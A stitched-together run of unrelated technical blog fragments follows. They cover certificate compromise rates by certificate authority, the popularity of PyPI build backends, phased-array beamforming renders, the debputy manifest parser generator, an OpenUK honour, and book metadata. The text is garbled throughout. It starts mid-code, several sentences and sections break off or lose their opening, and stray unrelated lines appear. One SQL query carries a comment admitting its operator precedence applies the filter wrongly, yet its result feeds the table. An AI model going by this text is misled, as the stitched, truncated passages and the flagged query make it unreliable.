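    "Sectigo": (88_323_068, 170),
    "ISRG (Let's Encrypt)": (315_476_402, 161),
    "GoDaddy": (56_121_429, 141),
    "DigiCert": (144_713_475, 81),
    "GlobalSign": (1_438_485, 46),
    "Entrust": (23_166, 3),
    "SSL.com": (171_816, 1),
}


def one_in(volume: int, compromised: int) -> int:
    """Number of issued certificates per known-compromised certificate."""
    return volume // compromised


# Sort from the worst (fewest certificates per compromise) to the best.
rows = sorted(data.items(), key=lambda item: one_in(*item[1]))

for issuer, (volume, compromised) in rows:
    print(f"{issuer}: 1 in {one_in(volume, compromised):,}")
```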

If you don't know who Professor Julius Sumner Miller is, I highly recommend finding out


    SELECT SUM(sub.NUM_ISSUED[2] - sub.NUM_EXPIRED[2])
      FROM (
        SELECT ca.name, max(coalesce(coalesce(nullif(trim(cc.SUBORDINATE_CA_OWNER), ''), nullif(trim(cc.CA_OWNER), '')), cc.INCLUDED_CERTIFICATE_OWNER)) as OWNER,
               ca.NUM_ISSUED, ca.NUM_EXPIRED
          FROM ccadb_certificate cc, ca_certificate cac, ca
         WHERE cc.CERTIFICATE_ID = cac.CERTIFICATE_ID
           AND cac.CA_ID = ca.ID
         GROUP BY ca.ID
      ) sub
     -- Note: AND binds tighter than OR, so as written the owner filter
     -- applies only to the CloudFlare match.
     WHERE sub.name ILIKE '%Amazon%' OR sub.name ILIKE '%CloudFlare%' AND sub.owner = 'DigiCert';

The number I get from running that query is 104,316,112, which should be subtracted from DigiCert's total issuance figures to get a more accurate view of what DigiCert's regular customers do with their private keys.

When I do this, the compromise rates table, sorted by the compromise rate, looks like this:

| Issuer | Issuance Volume | Compromised Count | Compromise Rate |
|---|---|---|---|
| Entrust | 23,166 | 3 | 1 in 7,722 |
| GlobalSign | 1,438,485 | 46 | 1 in 31,271 |
| SSL.com | 171,816 | 1 | 1 in 171,816 |
| GoDaddy | 56,121,429 | 141 | 1 in 398,024 |
| "Regular" DigiCert | 40,397,363 | 81 | 1 in 498,732 |
| Sectigo | 88,323,068 | 170 | 1 in 519,547 |
| All DigiCert | 144,713,475 | 81 | 1 in 1,786,586 |
| ISRG (Let's Encrypt) | 315,476,402 | 161 | 1 in 1,959,480 |
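As a quick check of the "Regular" DigiCert row, the adjustment is a single subtraction followed by the same division as before. The variable names below are only illustrative, and floor division is again an assumption that matches the table.

```python
# Figures taken from the text and tables above.
all_digicert_volume = 144_713_475
managed_volume = 104_316_112   # result of the SQL query above
digicert_compromised = 81

# Certificates issued to "regular" customers who handle their own keys.
regular_volume = all_digicert_volume - managed_volume
regular_rate = regular_volume // digicert_compromised

print(f"Regular DigiCert volume: {regular_volume:,}")
print(f"Compromise rate: 1 in {regular_rate:,}")
```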

The less humans have to do with certificate issuance, the less likely they are to compromise that certificate by exposing the private key. While it may not be surprising, it is nice to have some empirical evidence to back up the common wisdom.

Fully-managed TLS providers, such as CloudFlare, AWS Certificate Manager, and whatever Azure's thing is called, are the platonic ideal of this principle: never give humans any opportunity to expose a private key. I'm not saying you should use one of these providers, but the security approach they have adopted appears to be the optimal one, and should be emulated universally.

The ACME protocol is the next best, in that there are a variety of standardised tools widely available that allow humans to take themselves out of the loop, but it's still possible for humans to handle (and mistakenly expose) key material if they try hard enough.

Legacy issuance methods, which either cannot be automated, or require custom, per-provider automation to be developed, appear to be at least four times less helpful to the goal of avoiding compromise of the private key associated with a certificate.

No thanks, Bender, I'm busy tonight




Inspired by a Mastodon

post by Françoise Conil,

who investigated the current popularity of build backends used in


pyproject.toml files, I wanted to investigate how the popularity of build

backends used in pyproject.toml files evolved over the years since the

introduction of PEP-0517 in 2015.

Getting the data

Tom Forbes provides a huge

dataset that contains information

about every file within every release uploaded to PyPI. To

get the current dataset, we can use:

curl -L --remote-name-all $(curl -L "https://github.com/pypi-data/data/raw/main/links/dataset.txt")

describe select * from '*.parquet';

    column_name      column_type  null
    varchar          varchar      varchar
    project_name     VARCHAR      YES
    project_version  VARCHAR      YES
    project_release  VARCHAR      YES
    uploaded_on      TIMESTAMP    YES
    path             VARCHAR      YES
    archive_path     VARCHAR      YES
    size             UBIGINT      YES
    hash             BLOB         YES
    skip_reason      VARCHAR      YES
    lines            UBIGINT      YES
    repository       UINTEGER     YES
    11 rows  6 columns

pyproject.toml

files that are in the project's root directory. Since we'll still have to

download the actual files, we need to get the path and the repository to

construct the corresponding URL to the mirror that contains all files in a

bunch of huge git repositories. Some files are not available on the mirrors; to

skip these, we only take files where the skip_reason is empty. We also care

about the timestamp of the upload (uploaded_on) and the hash to avoid

processing identical files twice:

    select
        path,
        hash,
        uploaded_on,
        repository
    from '*.parquet'
    where
        skip_reason == '' and
        lower(string_split(path, '/')[-1]) == 'pyproject.toml' and
        len(string_split(path, '/')) == 5
    order by uploaded_on desc

With the repository and path, we can now construct a URL from which we

can fetch the actual file for further processing:

    url = f"https://raw.githubusercontent.com/pypi-data/pypi-mirror-{repository}/code/{path}"

pyproject.toml files and parse them to read

the build-backend into a dictionary mapping the file-hash to the build

backend. Downloads on GitHub are rate-limited, so downloading 1.2M files

will take a couple of days. By skipping files with a hash we've already

processed, we can avoid downloading the same file more than once, cutting the

required downloads by circa 50%.

Results

Assuming the data is complete and my analysis is sound, these are the findings:

There is a surprising number of build backends in use, but the number of
uploads per build backend drops off quickly, with a long tail of single
uploads:

    >>> results.backend.value_counts()
    backend
    setuptools        701550
    poetry            380830
    hatchling          56917
    flit               36223
    pdm                11437
    maturin             9796
    jupyter             1707
    mesonpy              625
    scikit               556
    ...
    postry                 1
    tree                   1
    setuptoos              1
    neuron                 1
    avalon                 1
    maturimaturinn         1
    jsonpath               1
    ha                     1
    pyo3                   1
    Name: count, Length: 73, dtype: int64

Looking at the right side of the plot, we see the current distribution. It

confirms Françoise's findings about the current popularity of build

backends:


pyproject.toml files. During that early

period, Flit started as the most popular build backend, but was eventually

displaced by Setuptools and Poetry.

Between 2020 and 2022, the overall usage of pyproject.toml files increased

significantly. By the end of 2022, the share of Setuptools peaked at 70%.

After 2020, other build backends experienced a gradual rise in popularity.

Among these, Hatch emerged as a notable contender, steadily gaining

traction and ultimately stabilizing at 10%.



We can also look into the absolute distribution of build backends over time:


The plot shows that Setuptools has the strongest growth trajectory, surpassing

all other build backends. Poetry and Hatch are growing at a comparable rate,

but since Hatch started roughly 4 years after Poetry, it's lagging behind in

popularity. Despite not being among the most widely used backends anymore, Flit

maintains a steady and consistent growth pattern, indicating its enduring

relevance in the Python packaging landscape.

The script for downloading and analyzing the data can be found in my GitHub

repository. It contains the results of the DuckDB query (so you
don't have to download the full dataset) and the pickled dictionary, mapping

the file hashes to the build backends, saving you days for downloading and

analyzing the pyproject.toml files yourself.

hz.tools will be tagged

#hztools.

cos and sin of the multiplied phase (in the range of 0 to tau), assuming

the transmitter is emitting a carrier wave at a static amplitude and all

clocks are in perfect sync.

    let observed_phases: Vec<Complex> = antennas
        .iter()
        .map(|antenna| {
            let distance = (antenna - tx).magnitude();
            let distance = distance - (distance as i64 as f64);
            ((distance / wavelength) * TAU)
        })
        .map(|phase| Complex(phase.cos(), phase.sin()))
        .collect();

    let beamformed_phases: Vec<Complex> = ...;
    let magnitude = beamformed_phases
        .iter()
        .zip(observed_phases.iter())
        .map(|(beamformed, observed)| observed * beamformed)
        .reduce(|acc, el| acc + el)
        .unwrap()
        .abs();
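For readers who want to experiment without the Rust tooling, the same idea can be sketched in Python. This is a simplified stand-in rather than a port of the code above: the function names are invented, the phase is computed from the full distance rather than its fractional part, and the steering weights are assumed to be the complex conjugates of the phases expected from the target direction (the original snippet elides how `beamformed_phases` is built).

```python
import cmath
import math

TAU = 2 * math.pi


def observed_phases(antennas, tx, wavelength):
    """Phase of a unit-amplitude carrier from `tx` as seen at each antenna."""
    return [cmath.exp(1j * TAU * math.dist(a, tx) / wavelength) for a in antennas]


def steering_weights(antennas, target, wavelength):
    """Assumed beamformer: conjugate of the phases expected from `target`."""
    return [p.conjugate() for p in observed_phases(antennas, target, wavelength)]


def beam_magnitude(beamformed, observed):
    """Sum the weighted signals and take the magnitude of the result."""
    return abs(sum(o * b for o, b in zip(observed, beamformed)))


wavelength = 1.0
# A 1x4 array along the x axis with quarter-wavelength spacing.
antennas = [(i * wavelength / 4, 0.0, 0.0) for i in range(4)]
tx = (300.0, 400.0, 0.0)

observed = observed_phases(antennas, tx, wavelength)
on_target = beam_magnitude(steering_weights(antennas, tx, wavelength), observed)
off_target = beam_magnitude(
    steering_weights(antennas, (-300.0, 400.0, 0.0), wavelength), observed
)

print(on_target, off_target)
```

When the array is steered at the transmitter, the four contributions add in phase and the magnitude approaches the number of antennas; steering elsewhere gives a smaller value.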

(x, y, z) point at

(azimuth, elevation, magnitude). The color attached to that point is

based on its distance from (0, 0, 0). I opted to use the

Life Aquatic

table for this one.

After this process is complete, I have a

point cloud of

((x, y, z), (r, g, b)) points. I wrote a small program using

kiss3d to render the point cloud using tons of

small spheres, and write out the frames to a set of PNGs, which get compiled

into a GIF.

Now for the fun part, let's take a look at some radiation patterns!

y and z axis, and separated by some

offset in the x axis. This configuration can sweep 180 degrees (not

the full 360), but can't be steered in elevation at all.

Let's take a look at what this looks like for a well constructed

1x4 phased array:





And now let's take a look at the renders as we play with the configuration of
this array and make sure things look right. Our initial quarter-wavelength
spacing is very effective and has some outstanding performance characteristics.
Let's check to see that everything looks right as a first test.

Nice. Looks perfect. When pointing forward at (0, 0), we'd expect to see a
torus, which we do. As we sweep between 0 and 360, astute observers will notice
the pattern is mirrored along the axis of the antennas: when the beam is facing
forward to 0 degrees, it'll also receive at 180 degrees just as strong. There's
a small sidelobe that forms when it's configured along the array, but
it also becomes the most directional, and the sidelobes remain fairly small.

The main lobe is a lot more narrow (not a bad thing!), but some significant
sidelobes have formed (not ideal). This can cause a lot of confusion when doing
things that require a lot of directional resolution unless they're compensated
for.

Very cool. As the spacing becomes longer in relation to the operating frequency,

we can see the sidelobes start to form out of the end of the antenna system.


z axis, and separated by a fixed offset

in either the x or y axis by their neighbor, forming a square when

viewed along the x/y axis.

Let's take a look at what this looks like for a well constructed

2x2 phased array:

Let's do the same as above and take a look at the renders as we play with the
configuration of this array and see what things look like. This configuration
should suppress the sidelobes and give us good performance, and even give us
some amount of control in elevation while we're at it.

Sweet. Heck yeah. The array is quite directional in the configured direction,

and can even sweep a little bit in elevation, a definite improvement

from the 1x4 above.


Mesmerising. This is my favorite render. The sidelobes are very fun to
watch come in and out of existence. It looks absolutely other-worldly.

Very very cool. The sidelobes wind up turning the very blobby cardioid into
an electromagnetic dog toy. I think we've proven to ourselves that using
a phased array much outside its designed frequency of operation seems like
a real bad idea.

    manifest-version: "0.1"
    installations:
    - install:
        source: foo
        dest-dir: usr/bin

    {
      "manifest-version": "0.1",
      "installations": [
        {
          "install": {
            "source": "foo",
            "dest-dir": "usr/bin"
          }
        }
      ]
    }

So beyond me being unsatisfied with the current situation, it was also clear to me that I needed to come up with a better solution if I wanted externally provided plugins for debputy. To put a bit more perspective on what I expected from the end result:

- Most plugins would probably throw KeyError: X or ValueError style errors for quite a while. Worst case, they would end on my table because the user would have a hard time telling where debputy ends and where the plugin starts. "Best" case, I would teach debputy to say "This poor error message was brought to you by plugin foo. Go complain to them". Either way, it would be a bad user experience.

- This even assumes plugin providers would actually bother writing manifest parsing code. If it is that difficult, then just providing a custom file in debian might tempt plugin providers and that would undermine the idea of having the manifest be the sole input for debputy.

- It had to cover as many parsing errors as possible. An error case this code would handle for you would be an error where I could ensure a sufficient degree of detail and context for the user.

- It should be type-safe / provide typing support such that IDEs/mypy could help you when you work on the parsed result.

- It had to support "normalization" of the input, such as

      # User provides
      - install: "foo"
      # Which is normalized into:
      - install:
          source: "foo"

- It must be simple to tell debputy what input you expected.

    # Example input matching this typed dict.
    #   {
    #     "sources": ["foo"]
    #     "into": ["pkg"]
    #   }
    class InstallExamplesTargetFormat(TypedDict):
        # Which source files to install (dest-dir is fixed)
        sources: List[str]
        # Which package(s) that should have these files installed.
        into: NotRequired[List[str]]

    # Example input matching this typed dict.
    #   {
    #     "source": "foo"
    #     "into": "pkg"
    #   }
    #
    class InstallExamplesManifestFormat(TypedDict):
        # Note that sources here is split into source (str) vs. sources (List[str])
        sources: NotRequired[List[str]]
        source: NotRequired[str]
        # We allow the user to write into: foo in addition to into: [foo]
        into: Union[str, List[str]]

    FullInstallExamplesManifestFormat = Union[
        InstallExamplesManifestFormat,
        List[str],
        str,
    ]

    def _handler(
        normalized_form: InstallExamplesTargetFormat,
    ) -> InstallRule:
        ...  # Do something with the normalized form and return an InstallRule.

    concept_debputy_api.add_install_rule(
        keyword="install-examples",
        target_form=InstallExamplesTargetFormat,
        manifest_form=FullInstallExamplesManifestFormat,
        handler=_handler,
    )

This prototype did not take long (I remember it being within a day) and worked surprisingly well, though with some poor error messages here and there. Now came the first challenge, adding the manifest format schema plus relevant normalization rules. The very first normalization I did was transforming into: Union[str, List[str]] into into: List[str]. At that time, source was not a separate attribute. Instead, sources was a Union[str, List[str]], so it was the only normalization I needed for all my use-cases at the time. There are two problems when writing a normalization. First is determining what the "source" type is, what the target type is and how they relate. The second is providing a runtime rule for normalizing from the manifest format into the target format. Keeping it simple, the runtime normalizer for Union[str, List[str]] -> List[str] was written as:

- Read TypedDict.__required_keys__ and TypedDict.__optional_keys__ to determine which attributes were present and which were required. This was used for reporting errors when the input did not match.

- Read the types of the provided TypedDict, strip the Required / NotRequired markers and use basic isinstance checks based on the resulting type for str and List[str]. Again, used for reporting errors when the input did not match.

    def normalize_into_list(x: Union[str, List[str]]) -> List[str]:
        return x if isinstance(x, list) else [x]

    # Map from
    class InstallExamplesManifestFormat(TypedDict):
        # Note that sources here is split into source (str) vs. sources (List[str])
        sources: NotRequired[List[str]]
        source: NotRequired[str]
        # We allow the user to write into: foo in addition to into: [foo]
        into: Union[str, List[str]]

    # ... into
    class InstallExamplesTargetFormat(TypedDict):
        # Which source files to install (dest-dir is fixed)
        sources: List[str]
        # Which package(s) that should have these files installed.
        into: NotRequired[List[str]]

While working on all of this type introspection for Python, I had noted the Annotated[X, ...] type. It is basically a fake type that enables you to attach metadata into the type system. A very random example:

- How will the parser generator understand that source should be normalized and then mapped into sources?

- Once that is solved, the parser generator has to understand that while source and sources are declared as NotRequired, they are part of an "exactly one of" rule (since sources in the target form is Required). This mainly came down to extra bookkeeping and an extra layer of validation once the previous step is solved.

# For all intents and purposes, foo is a string despite all the Annotated stuff.

foo: Annotated[str, "hello world"] = "my string here"
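To make the "fake type" point concrete, here is a small sketch of how the metadata attached via Annotated can be read back with the standard typing helpers. The Example class is only a holder for the annotation and is not part of debputy.

```python
from typing import Annotated, get_args, get_type_hints


class Example:
    # Same annotation as above, placed on a class so it can be introspected.
    foo: Annotated[str, "hello world"] = "my string here"


# By default the Annotated wrapper is stripped and only the real type remains.
plain = get_type_hints(Example)["foo"]

# With include_extras=True the wrapper is kept, and get_args exposes
# the underlying type followed by the attached metadata.
with_extras = get_type_hints(Example, include_extras=True)["foo"]
base_type, *metadata = get_args(with_extras)
```

Here plain and base_type are both str, while metadata holds the extra "hello world" value that a tool is free to interpret however it likes.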

# Map from
#
#   "source": "foo"  # (or "sources": ["foo"])
#   "into": "pkg"
#
class InstallExamplesManifestFormat(TypedDict):
    # Note that sources here is split into source (str) vs. sources (List[str])
    sources: NotRequired[List[str]]
    source: NotRequired[
        Annotated[
            str,
            DebputyParseHint.target_attribute("sources")
        ]
    ]
    # We allow the user to write into: foo in addition to into: [foo]
    into: Union[str, List[str]]

# ... into
#
#   "sources": ["foo"]
#   "into": ["pkg"]
#
class InstallExamplesTargetFormat(TypedDict):
    # Which source files to install (dest-dir is fixed)
    sources: List[str]
    # Which package(s) that should have these files installed.
    into: NotRequired[List[str]]

It was not super difficult given the existing infrastructure, but it did take some hours of coding and debugging. Additionally, I added a parse hint to support making the into conditional based on whether it was a single binary package. With this done, you could now write something like:

- Conversion table where the parser generator can tell that BinaryPackage requires an input of str and a callback to map from str to BinaryPackage. (That is probably a lie. I think the conversion table came later, but honestly I do not remember and I am not digging into the git history for this one.)

- At runtime, said callback needed access to the list of known packages, so it could resolve the provided string.

# Map from
class InstallExamplesManifestFormat(TypedDict):
    # Note that sources here is split into source (str) vs. sources (List[str])
    sources: NotRequired[List[str]]
    source: NotRequired[
        Annotated[
            str,
            DebputyParseHint.target_attribute("sources")
        ]
    ]
    # We allow the user to write into: foo in addition to into: [foo]
    into: Union[BinaryPackage, List[BinaryPackage]]

# ... into
class InstallExamplesTargetFormat(TypedDict):
    # Which source files to install (dest-dir is fixed)
    sources: List[str]
    # Which package(s) that should have these files installed.
    into: NotRequired[
        Annotated[
            List[BinaryPackage],
            DebputyParseHint.required_when_multi_binary()
        ]
    ]
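The conversion table idea mentioned above could look roughly like the sketch below. Everything in it is an assumption made for illustration: this BinaryPackage is a simplified stand-in for debputy's type, and ParseContext, CONVERSIONS and convert are invented names. The point is only that each high-level type is paired with the input type it expects and a callback that can consult runtime state such as the list of known packages.

```python
from dataclasses import dataclass
from typing import Any, Callable, Dict, Tuple


@dataclass(frozen=True)
class BinaryPackage:
    """Simplified, hypothetical stand-in for debputy's BinaryPackage."""
    name: str


@dataclass
class ParseContext:
    """Hypothetical runtime state handed to every conversion callback."""
    known_packages: Dict[str, BinaryPackage]


def _to_binary_package(raw: str, context: ParseContext) -> BinaryPackage:
    # Resolve the provided string against the packages known at runtime.
    try:
        return context.known_packages[raw]
    except KeyError:
        raise ValueError(f"unknown package: {raw}") from None


# target type -> (type expected in the manifest, callback producing the target type)
CONVERSIONS: Dict[type, Tuple[type, Callable[[Any, ParseContext], Any]]] = {
    BinaryPackage: (str, _to_binary_package),
}


def convert(raw: object, target_type: type, context: ParseContext) -> Any:
    input_type, callback = CONVERSIONS[target_type]
    if not isinstance(raw, input_type):
        raise ValueError(
            f"expected {input_type.__name__}, got {type(raw).__name__}"
        )
    return callback(raw, context)
```

Keeping the expected input type next to the callback lets the type check and its error message stay generic, so the callback only has to deal with values of the right basic type.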

In this way everybody wins. Yes, writing this parser generator code was more enjoyable than writing the ad-hoc manual parsers it replaced. :)

- The parser engine handles most of the error reporting, meaning users get most of the errors in a standard format without the plugin provider having to spend any effort on it. There will be some effort in more complex cases, but the common cases are done for you.

- It is easy to provide flexibility to users while avoiding having to write code to normalize the user input into a simplified programmer oriented format.

- The parser handles mapping from basic types into higher forms for you. These days, we have high level types like FileSystemMode (either an octal or a symbolic mode), different kinds of file system matches depending on whether globs should be performed, etc. These types include their own validation and parsing rules that debputy handles for you.

- Introspection and support for providing online reference documentation. Also, debputy checks that the provided attribute documentation covers all the attributes in the manifest form. If you add a new attribute, debputy will remind you if you forget to document it as well. :)

Apparently I got an honour from OpenUK.

There are a bunch of people I know on that list. Chris Lamb and Mark Brown are familiar names from Debian. Colin King and Jonathan Riddell are people I know from past work in Ubuntu. I've admired David MacIver's work on Hypothesis and Richard Hughes' work on firmware updates from afar. And there are a bunch of other excellent projects represented there: OpenStreetMap, Textualize, and my alma mater of Cambridge to name but a few.

My friend Stuart Langridge wrote about being on a similar list a few years ago, and I can't do much better than to echo it: in particular he wrote about the way the open source development community is often at best unwelcoming to people who don't look like Stuart and I do. I can't tell a whole lot about demographic distribution just by looking at a list of names, but while these honours still seem to be skewed somewhat male, I'm fairly sure they're doing a lot better in terms of gender balance than my home project of Debian is, for one. I hope this is a sign of improvement for the future, and I'll do what I can to pay it forward.

src for images got deleted instead of properly converted.

| Publisher: | Dutton Books |

| Copyright: | February 2019 |

| Printing: | 2020 |

| ISBN: | 0-7352-3190-7 |

| Format: | Kindle |

| Pages: | 339 |

| Publisher: | Fairwood Press |

| Copyright: | November 2023 |

| ISBN: | 1-958880-16-7 |

| Format: | Kindle |

| Pages: | 257 |

Next.